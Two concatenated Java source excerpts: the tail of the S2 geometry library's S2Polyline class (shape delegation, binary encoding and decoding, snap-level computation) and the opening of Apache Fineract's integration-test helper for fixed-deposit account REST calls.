              public S2Point getChainVertex(int chainId, int edgeOffset) {
                Preconditions.checkElementIndex(chainId, numChains());
                return vertex(edgeOffset);
              }

              @Override
              public void getChainPosition(int edgeId, ChainPosition result) {
                // All the edges are in the single chain.
                result.set(0, edgeId);
              }

              @Override
              public int dimension() {
                return 1;
              }
            };
      }
    }
    return shape;
  }

  /** @deprecated Use shape().numEdges() */
  @Deprecated
  @InlineMe(replacement = "this.shape().numEdges()")
  @Override
  public int numEdges() {
    return shape().numEdges();
  }

  /** @deprecated Use shape().getEdge(index, result) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getEdge(index, result)")
  @Override
  public void getEdge(int index, MutableEdge result) {
    shape().getEdge(index, result);
  }

  /** @deprecated Use shape().hasInterior() */
  @Deprecated
  @InlineMe(replacement = "this.shape().hasInterior()")
  @Override
  public boolean hasInterior() {
    return shape().hasInterior();
  }

  /** @deprecated Use shape().containsOrigin() */
  @Deprecated
  @InlineMe(replacement = "this.shape().containsOrigin()")
  @Override
  public boolean containsOrigin() {
    return shape().containsOrigin();
  }

  /** @deprecated Use shape().numChains() */
  @Deprecated
  @InlineMe(replacement = "this.shape().numChains()")
  @Override
  public int numChains() {
    return shape().numChains();
  }

  /** @deprecated Use shape().getChainStart(chainId) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getChainStart(chainId)")
  @Override
  public int getChainStart(int chainId) {
    return shape().getChainStart(chainId);
  }

  /** @deprecated Use shape().getChainLength(chainId) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getChainLength(chainId)")
  @Override
  public int getChainLength(int chainId) {
    return shape().getChainLength(chainId);
  }

  /** @deprecated Use shape().getChainEdge(chainId, offset, result) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getChainEdge(chainId, offset, result)")
  @Override
  public void getChainEdge(int chainId, int offset, MutableEdge result) {
    shape().getChainEdge(chainId, offset, result);
  }

  /** @deprecated Use shape().getChainVertex(chainId, edgeOffset) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getChainVertex(chainId, edgeOffset)")
  @Override
  public S2Point getChainVertex(int chainId, int edgeOffset) {
    return shape().getChainVertex(chainId, edgeOffset);
  }

  /** @deprecated Use shape().getChainPosition(edgeId, result) */
  @Deprecated
  @InlineMe(replacement = "this.shape().getChainPosition(edgeId, result)")
  @Override
  public void getChainPosition(int edgeId, ChainPosition result) {
    shape().getChainPosition(edgeId, result);
  }

  /** @deprecated Use shape().dimension() */
  @Deprecated
  @InlineMe(replacement = "this.shape().dimension()")
  @Override
  public int dimension() {
    return shape().dimension();
  }

  /** Encodes this polyline into the given output stream. */
  @JsIgnore // OutputStream is not available to J2CL.
  public void encode(OutputStream os) throws IOException {
    encodeUncompressed(new LittleEndianOutput(os));
  }

  /**
   * Encodes the polyline into an efficient, lossless binary representation, which can be decoded by
   * calling {@link S2Polyline#decode}. The encoding is byte-compatible with the C++ version of the
   * S2 library.
   *
   * @param output The output stream into which the encoding should be written.
   * @throws IOException if there was a problem writing into the output stream.
   */
  @JsIgnore // OutputStream is not available to J2CL.
  public void encodeCompact(OutputStream output) throws IOException {
    // getBestSnapLevel() is -1 when no vertex is snapped to a cell center, in which case we fall
    // back to the lossless encoding. An empty polyline is encoded compressed at the maximum level.
    int level = numVertices == 0 ? S2CellId.MAX_LEVEL : getBestSnapLevel();
    LittleEndianOutput encoder = new LittleEndianOutput(output);
    if (level == -1) {
      encodeUncompressed(encoder);
    } else {
      encodeCompressed(level, encoder);
    }
  }

  /** Encodes this polyline into the given little endian output stream. */
  void encodeUncompressed(LittleEndianOutput os) throws IOException {
    os.writeByte(LOSSLESS_ENCODING_VERSION);
    os.writeInt(numVertices);
    for (S2Point p : vertices) {
      p.encode(os);
    }
  }

  /** Encodes a compressed polyline at requested snap level.
   */
  void encodeCompressed(int snapLevel, LittleEndianOutput encoder) throws IOException {
    encoder.writeByte(COMPRESSED_ENCODING_VERSION);
    encoder.writeByte((byte) snapLevel);
    encoder.writeVarint32(numVertices);
    S2PointCompression.encodePointsCompressed(vertices(), snapLevel, encoder);
  }

  /** Decodes a polyline from the given input stream, as written by {@link #encode} or {@link #encodeCompact}. */
  @JsIgnore // InputStream is not available to J2CL.
  public static S2Polyline decode(InputStream is) throws IOException {
    return decode(new LittleEndianInput(is));
  }

  static S2Polyline decode(LittleEndianInput decoder) throws IOException {
    // Dispatch on the version byte written by the corresponding encoder.
    byte version = decoder.readByte();
    switch (version) {
      case LOSSLESS_ENCODING_VERSION:
        return decodeLossless(decoder);
      case COMPRESSED_ENCODING_VERSION:
        return decodeCompressed(decoder);
      default:
        throw new IOException("Unsupported S2Polyline encoding version " + version);
    }
  }

  /** Decodes the body of a version-1 (lossless) encoding: a vertex count followed by raw points. */
  private static S2Polyline decodeLossless(LittleEndianInput is) throws IOException {
    int length = is.readInt();
    if (length < 0) {
      throw new IOException("Invalid length " + length);
    }
    S2Point[] vertices = new S2Point[length];
    for (int i = 0; i < vertices.length; i++) {
      vertices[i] = S2Point.decode(is);
    }
    return new S2Polyline(vertices);
  }

  /** Decodes the body of a version-2 (compressed) encoding: snap level, count, compressed points. */
  private static S2Polyline decodeCompressed(LittleEndianInput decoder) throws IOException {
    int level = decoder.readByte();
    if (level > S2CellId.MAX_LEVEL || level < 0) {
      throw new IOException("Invalid level " + level);
    }
    int numVertices = decoder.readVarint32();
    if (numVertices < 0) {
      throw new IOException("Invalid number of vertices: " + numVertices);
    }
    return new S2Polyline(S2PointCompression.decodePointsCompressed(numVertices, level, decoder));
  }

  /**
   * If all of the polyline's vertices happen to be the centers of S2Cells at some level, then
   * returns that level, otherwise returns -1. See also {@link #fromSnapped(S2Polyline, int)}.
   * Returns -1 if the polyline has no vertices.
   */
  public int getSnapLevel() {
    int snapLevel = -1;
    for (S2Point p : vertices) {
      FaceSiTi faceSiTi = S2Projections.xyzToFaceSiTi(p);
      int level = S2Projections.levelIfCenter(faceSiTi, p);
      if (level < 0) {
        // Vertex is not a cell center.
        return level;
      }
      if (level != snapLevel) {
        if (snapLevel < 0) {
          // First vertex.
          snapLevel = level;
        } else {
          // Vertices at more than one cell level.
          return -1;
        }
      }
    }
    return snapLevel;
  }

  /**
   * Computes the level at which most of the vertices are snapped. If multiple levels have the same
   * maximum number of vertices snapped to it, the first one (lowest level number / largest area /
   * smallest encoding length) will be chosen, so this is desired. Returns -1 for unsnapped
   * polylines.
   */
  int getBestSnapLevel() {
    // Histogram of how many vertices sit exactly at a cell center of each level.
    int[] histogram = new int[S2CellId.MAX_LEVEL + 1];
    for (S2Point p : vertices) {
      FaceSiTi faceSiTi = S2Projections.xyzToFaceSiTi(p);
      int level = S2Projections.levelIfCenter(faceSiTi, p);
      // Level is -1 for unsnapped points.
      if (level >= 0) {
        histogram[level]++;
      }
    }
    int snapLevel = 0;
    for (int i = 1; i < histogram.length; i++) {
      if (histogram[i] > histogram[snapLevel]) {
        snapLevel = i;
      }
    }
    if (histogram[snapLevel] == 0 && numVertices > 0) {
      // This is an unsnapped polyline.
      return -1;
    }
    return snapLevel;
  }

  /**
   * Returns a new S2Polyline with reversed order of vertices to the original.
   */
  public S2Polyline reversed() {
    return new S2Polyline(Lists.reverse(vertices()));
  }
}
apache/fineract
36,029
integration-tests/src/test/java/org/apache/fineract/integrationtests/common/fixeddeposit/FixedDepositAccountHelper.java
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.fineract.integrationtests.common.fixeddeposit;

import com.google.gson.Gson;
import io.restassured.specification.RequestSpecification;
import io.restassured.specification.ResponseSpecification;
import java.util.ArrayList;
import java.util.Calendar;
import java.util.HashMap;
import java.util.List;
import org.apache.fineract.integrationtests.common.CommonConstants;
import org.apache.fineract.integrationtests.common.Utils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

// Integration-test helper that builds JSON payloads for, and issues REST calls against, the
// fixed deposit account API.
@SuppressWarnings({ "unused", "rawtypes" })
public class FixedDepositAccountHelper {

    private static final Logger LOG = LoggerFactory.getLogger(FixedDepositAccountHelper.class);

    // REST-Assured specifications shared by all instance-level requests of this helper.
    private final RequestSpecification requestSpec;
    private final ResponseSpecification responseSpec;

    // TODO: Rewrite to use fineract-client instead!
    // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long,
    // org.apache.fineract.client.models.PostLoansLoanIdRequest)
    @Deprecated(forRemoval = true)
    public FixedDepositAccountHelper(final RequestSpecification requestSpec, final ResponseSpecification responseSpec) {
        this.requestSpec = requestSpec;
        this.responseSpec = responseSpec;
    }

    // Base REST endpoints for the fixed deposit account resource.
    private static final String FIXED_DEPOSIT_ACCOUNT_URL = "/fineract-provider/api/v1/fixeddepositaccounts";
    private static final String APPLY_FIXED_DEPOSIT_ACCOUNT_URL = FIXED_DEPOSIT_ACCOUNT_URL + "?" + Utils.TENANT_IDENTIFIER;

    // Values for the API's "command" query parameter.
    private static final String APPROVE_FIXED_DEPOSIT_COMMAND = "approve";
    private static final String UNDO_APPROVAL_FIXED_DEPOSIT_COMMAND = "undoapproval";
    private static final String REJECT_FIXED_DEPOSIT_COMMAND = "reject";
    private static final String WITHDRAWN_BY_CLIENT_FIXED_DEPOSIT_COMMAND = "withdrawnByApplicant";
    private static final String ACTIVATE_FIXED_DEPOSIT_COMMAND = "activate";
    private static final String CLOSE_FIXED_DEPOSIT_COMMAND = "close";
    private static final String POST_INTEREST_FIXED_DEPOSIT_COMMAND = "postInterest";
    private static final String CALCULATE_INTEREST_FIXED_DEPOSIT_COMMAND = "calculateInterest";
    private static final String CALCULATE_PREMATURE_AMOUNT_COMMAND = "calculatePrematureAmount";
    private static final String PREMATURE_CLOSE_COMMAND = "prematureClose";

    private static final String LOCALE = "en_GB";
    private static final String DIGITS_AFTER_DECIMAL = "4";
    private static final String IN_MULTIPLES_OF = "100";
    private static final String USD = "USD";

    // Frequency type ids, used for deposit term / period fields below.
    public static final String DAYS = "0";
    private static final String WEEKS = "1";
    private static final String MONTHS = "2";
    private static final String YEARS = "3";

    // Interest compounding / posting period type ids.
    private static final String DAILY = "1";
    private static final String MONTHLY = "4";
    private static final String QUARTERLY = "5";
    private static final String BI_ANNUALLY = "6";
    private static final String ANNUALLY = "7";

    // Interest calculation type ids.
    private static final String INTEREST_CALCULATION_USING_DAILY_BALANCE = "1";
    private static final String INTEREST_CALCULATION_USING_AVERAGE_DAILY_BALANCE = "2";

    // Days-in-year conventions for interest calculation.
    private static final String DAYS_360 = "360";
    private static final String DAYS_365 = "365";

    public static final String DEPOSIT_AMOUNT = "100000";

    // Mutable builder state consumed by build(); each field maps to a JSON property of the
    // fixed deposit application request.
    private String newDepositAmount = null;
    private String interestCompoundingPeriodType = MONTHLY;
    private String interestPostingPeriodType = MONTHLY;
    private String interestCalculationType = INTEREST_CALCULATION_USING_DAILY_BALANCE;
    private String lockinPeriodFrequency = "1";
    private String lockingPeriodFrequencyType = MONTHS;
    private final String minDepositTerm = "6";
    private final String minDepositTermTypeId = MONTHS;
    private final String maxDepositTerm = "10";
    private final String maxDepositTermTypeId = YEARS;
    private final String inMultiplesOfDepositTerm = "2";
    private final String inMultiplesOfDepositTermTypeId = MONTHS;
    private final String preClosurePenalInterest = "2";
    private String interestCalculationDaysInYearType = DAYS_365;
    private final boolean preClosurePenalApplicable = true;
    private final boolean isActiveChart = true;
    private final String currencyCode = USD;
    private String depositPeriod = "14";
    private final String depositPeriodFrequencyId = MONTHS;
    private String submittedOnDate = "";
    private String savingsId = null;
    private boolean transferInterest = false;
    private Integer maturityInstructionId;
    private List<HashMap<String, String>> charges;

    // TODO: Rewrite to use fineract-client instead!
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public String build(final String clientId, final String productId, final String penalInterestType) { final HashMap<String, Object> map = new HashMap<>(); map.put("productId", productId); map.put("clientId", clientId); map.put("interestCalculationDaysInYearType", this.interestCalculationDaysInYearType); map.put("locale", LOCALE); map.put("dateFormat", "dd MMMM yyyy"); map.put("monthDayFormat", "dd MMM"); map.put("interestCalculationType", this.interestCalculationType); map.put("interestCompoundingPeriodType", this.interestCompoundingPeriodType); map.put("interestPostingPeriodType", this.interestPostingPeriodType); map.put("lockinPeriodFrequency", this.lockinPeriodFrequency); map.put("lockinPeriodFrequencyType", this.lockingPeriodFrequencyType); map.put("preClosurePenalApplicable", "true"); map.put("minDepositTermTypeId", this.minDepositTermTypeId); map.put("minDepositTerm", this.minDepositTerm); map.put("maxDepositTermTypeId", this.maxDepositTermTypeId); map.put("maxDepositTerm", this.maxDepositTerm); map.put("preClosurePenalApplicable", this.preClosurePenalApplicable); map.put("inMultiplesOfDepositTerm", this.inMultiplesOfDepositTerm); map.put("inMultiplesOfDepositTermTypeId", this.inMultiplesOfDepositTermTypeId); map.put("preClosurePenalInterest", this.preClosurePenalInterest); map.put("preClosurePenalInterestOnTypeId", penalInterestType); map.put("depositAmount", getDepositAmount()); map.put("depositPeriod", this.depositPeriod); map.put("depositPeriodFrequencyId", this.depositPeriodFrequencyId); map.put("submittedOnDate", this.submittedOnDate); map.put("linkAccountId", savingsId); map.put("transferInterestToSavings", transferInterest); map.put("maturityInstructionId", maturityInstructionId); map.put("charges", charges); String fixedDepositAccountJson = new 
Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Integer applyFixedDepositApplicationGetId(final String fixedDepositAccountAsJson, final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("--------------------- APPLYING FOR FIXED DEPOSIT ACCOUNT ------------------------"); return Utils.performServerPost(requestSpec, responseSpec, APPLY_FIXED_DEPOSIT_ACCOUNT_URL, fixedDepositAccountAsJson, CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static String applyFixedDepositApplication(final String fixedDepositAccountAsJson, final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("--------------------- APPLYING FOR FIXED DEPOSIT ACCOUNT ------------------------"); return Utils.performServerPost(requestSpec, responseSpec, APPLY_FIXED_DEPOSIT_ACCOUNT_URL, fixedDepositAccountAsJson); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static HashMap getFixedDepositAccountById(final RequestSpecification requestSpec, final ResponseSpecification responseSpec, final Integer accountID) { final String GET_FIXED_DEPOSIT_BY_ID_URL = FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" 
+ Utils.TENANT_IDENTIFIER; LOG.info("------------------------ RETRIEVING FIXED DEPOSIT ACCOUNT BY ID -------------------------"); return Utils.performServerGet(requestSpec, responseSpec, GET_FIXED_DEPOSIT_BY_ID_URL, ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap getFixedDepositSummary(final Integer accountID) { return getFixedDepositDetails(accountID, "summary"); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap getFixedDepositDetails(final Integer accountID) { return getFixedDepositDetails(accountID, ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private HashMap getFixedDepositDetails(final Integer accountID, final String jsonAttributeToGetBack) { final String URL = FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER; final HashMap response = Utils.performServerGet(requestSpec, responseSpec, URL, jsonAttributeToGetBack); return response; } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Float getInterestRate(ArrayList<ArrayList<HashMap>> interestSlabData, Integer depositPeriod) { Float annualInterestRate = 0.0f; for (Integer slabIndex = 0; slabIndex < interestSlabData.get(0).size(); slabIndex++) { Integer fromPeriod = (Integer) interestSlabData.get(0).get(slabIndex).get("fromPeriod"); Integer toPeriod = (Integer) interestSlabData.get(0).get(slabIndex).get("toPeriod"); if (depositPeriod >= fromPeriod && depositPeriod <= toPeriod) { annualInterestRate = (Float) interestSlabData.get(0).get(slabIndex).get("annualInterestRate"); break; } } return annualInterestRate; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Float getPrincipalAfterCompoundingInterest(Calendar currentDate, Float principal, Integer depositPeriod, double interestPerDay, Integer compoundingInterval, Integer postingInterval) { Float totalInterest = 0.0f; Float interestEarned = 0.0f; for (int i = 1; i <= depositPeriod; i++) { Integer daysInMonth = currentDate.getActualMaximum(Calendar.DATE); for (int j = 0; j < daysInMonth; j++) { interestEarned = (float) (principal * interestPerDay); totalInterest += interestEarned; if (compoundingInterval == 0) { principal += interestEarned; } } if ((i % postingInterval) == 0 || i == depositPeriod) { if (compoundingInterval != 0) { principal += totalInterest; } totalInterest = 0.0f; LOG.info("{}", principal.toString()); } currentDate.add(Calendar.MONTH, 1); interestEarned = 0.0f; } return principal; } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap updateFixedDepositAccount(final String clientID, final String productID, final String accountID, final String validFrom, final String validTo, final String penalInterestType, final String submittedOnDate) { final String fixedDepositApplicationJSON = new FixedDepositAccountHelper(this.requestSpec, this.responseSpec) // .withSubmittedOnDate(submittedOnDate) // .build(clientID, productID, penalInterestType); return Utils.performServerPut(this.requestSpec, this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER, fixedDepositApplicationJSON, CommonConstants.RESPONSE_CHANGES); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap updateInterestCalculationConfigForFixedDeposit(final String clientID, final String productID, final String accountID, final String submittedOnDate, final String validFrom, final String validTo, final String numberOfDaysPerYear, final String penalInterestType, final String interestCalculationType, final String interestCompoundingPeriodType, final String interestPostingPeriodType) { final String fixedDepositApplicationJSON = new FixedDepositAccountHelper(this.requestSpec, this.responseSpec) // .withSubmittedOnDate(submittedOnDate) // .withNumberOfDaysPerYear(numberOfDaysPerYear) // .withInterestCalculationPeriodType(interestCalculationType) // .withInterestCompoundingPeriodType(interestCompoundingPeriodType) // .withInterestPostingPeriodType(interestPostingPeriodType) // .build(clientID, productID, penalInterestType); return Utils.performServerPut(this.requestSpec, 
this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER, fixedDepositApplicationJSON, CommonConstants.RESPONSE_CHANGES); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap approveFixedDeposit(final Integer fixedDepositAccountID, final String approvedOnDate) { LOG.info("--------------------------------- APPROVING FIXED DEPOSIT APPLICATION ------------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(APPROVE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getApproveFixedDepositAccountAsJSON(approvedOnDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap undoApproval(final Integer fixedDepositAccountID) { LOG.info("--------------------------------- UNDO APPROVING FIXED DEPOSIT APPLICATION -------------------------------"); final String undoBodyJson = "{'note':'UNDO APPROVAL'}"; return performFixedDepositApplicationActions( createFixedDepositOperationURL(UNDO_APPROVAL_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), undoBodyJson); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap rejectApplication(final Integer fixedDepositAccountID, final String rejectedOnDate) { LOG.info("--------------------------------- REJECT FIXED DEPOSIT APPLICATION -------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(REJECT_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getRejectedFixedDepositAsJSON(rejectedOnDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap withdrawApplication(final Integer fixedDepositAccountID, final String withdrawApplicationOnDate) { LOG.info("--------------------------------- Withdraw FIXED DEPOSIT APPLICATION -------------------------------"); return performFixedDepositApplicationActions( createFixedDepositOperationURL(WITHDRAWN_BY_CLIENT_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getWithdrawnFixedDepositAccountAsJSON(withdrawApplicationOnDate)); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap activateFixedDeposit(final Integer fixedDepositAccountID, final String activationDate) { LOG.info("---------------------------------- ACTIVATING FIXED DEPOSIT APPLICATION ----------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(ACTIVATE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getActivatedFixedDepositAccountAsJSON(activationDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object deleteFixedDepositApplication(final Integer fixedDepositAccountID, final String jsonAttributeToGetBack) { LOG.info("---------------------------------- DELETE FIXED DEPOSIT APPLICATION ----------------------------------"); return Utils.performServerDelete(this.requestSpec, this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?" + Utils.TENANT_IDENTIFIER, jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Integer calculateInterestForFixedDeposit(final Integer fixedDepositAccountId) { LOG.info("--------------------------------- CALCULATING INTEREST FOR FIXED DEPOSIT --------------------------------"); return (Integer) performFixedDepositActions( createFixedDepositCalculateInterestURL(CALCULATE_INTEREST_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getCalculatedInterestForFixedDepositApplicationAsJSON(), CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Integer postInterestForFixedDeposit(final Integer fixedDepositAccountId) { LOG.info("--------------------------------- POST INTEREST FOR FIXED DEPOSIT --------------------------------"); return (Integer) performFixedDepositActions( createFixedDepositCalculateInterestURL(POST_INTEREST_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getCalculatedInterestForFixedDepositApplicationAsJSON(), CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap calculatePrematureAmountForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate) { LOG.info("--------------------- CALCULATING PREMATURE AMOUNT FOR FIXED DEPOSIT ----------------------------"); return (HashMap) performFixedDepositActions( createFixedDepositCalculateInterestURL(CALCULATE_PREMATURE_AMOUNT_COMMAND, fixedDepositAccountId), getCalculatedPrematureAmountForFixedDepositAccountAsJSON(closedOnDate), ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object prematureCloseForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate, final String closureType, final Integer toSavingsId, final String jsonAttributeToGetBack) { LOG.info("--------------------- PREMATURE CLOSE FOR FIXED DEPOSIT ----------------------------"); return performFixedDepositActions(createFixedDepositCalculateInterestURL(PREMATURE_CLOSE_COMMAND, fixedDepositAccountId), getPrematureCloseForFixedDepositAccountAsJSON(closedOnDate, closureType, toSavingsId), jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object closeForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate, final String closureType, final Integer toSavingsId, final String jsonAttributeToGetBack) { LOG.info("--------------------- CLOSE FOR FIXED DEPOSIT ----------------------------"); return performFixedDepositActions(createFixedDepositCalculateInterestURL(CLOSE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getPrematureCloseForFixedDepositAccountAsJSON(closedOnDate, closureType, toSavingsId), jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getApproveFixedDepositAccountAsJSON(final String approvedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("approvedOnDate", approvedOnDate); map.put("note", "Approval NOTE"); String fixedDepositAccountApproveJson = new Gson().toJson(map); LOG.info(fixedDepositAccountApproveJson); return fixedDepositAccountApproveJson; } // TODO: Rewrite to use fineract-client instead! 
// Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getRejectedFixedDepositAsJSON(final String rejectedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("rejectedOnDate", rejectedOnDate); map.put("note", "Rejected NOTE"); String fixedDepositAccountJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getWithdrawnFixedDepositAccountAsJSON(final String withdrawnApplicationOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("withdrawnOnDate", withdrawnApplicationOnDate); map.put("note", "Withdraw NOTE"); String fixedDepositAccountJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! 
